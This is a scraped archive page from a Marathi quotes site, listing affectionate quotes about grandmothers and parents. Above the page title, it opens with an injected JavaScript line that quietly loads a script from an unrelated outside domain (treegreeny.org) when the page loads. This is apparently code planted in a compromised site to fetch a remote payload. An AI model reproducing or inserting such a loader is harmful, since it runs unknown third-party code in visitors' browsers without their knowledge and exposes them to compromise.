;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); aai baba quotes in marathi Archives - EDIIFY

Aaji Quotes In Marathi

Aaji Quotes In Marathi

  1.कधी बाबा रागवले का आपल्याला आई वाचवते मला कधीही रांगवल्ली तर आपला जीव वाचवत असते. आजी हे तिच्या प्रत्येक नातवंडांवर प्रेम करत असते. 2. आजी ही कधी कधी आपल्याला महिन्याला पॉकेटमनी देखील देत असते. ती आपल्या सर्व लाड पूर्ण करत असते. आजी ही तर आपल्या मैत्री सारखी असते आपल्या मनातलं सर्व काय आपण तिच्याजवळ … Read more

20 Aai Baba Quotes In marathi

  1. ❤️आईच्या ममतेचा आणि बापाच्या  क्षमतेचा अंदाज कधीच लागत नाही.❤️ 2. ❤️विश्वास बापावर ठेवा आणि  प्रेम आईवर करा ना कधी  धोका भेटेल ना कधी मन तुटेल.❤️ 3. ❤️या जगात आई वडिल सोडले ना  तर आपली कदर कोणालाच नसते  हे मरेपर्यंत विसरू नका.❤️ 4. ❤️ज्याला आईबापाच्या कष्टाची  जाणीव असते ना तो कधीच  वाईट मार्गाला जात … Read more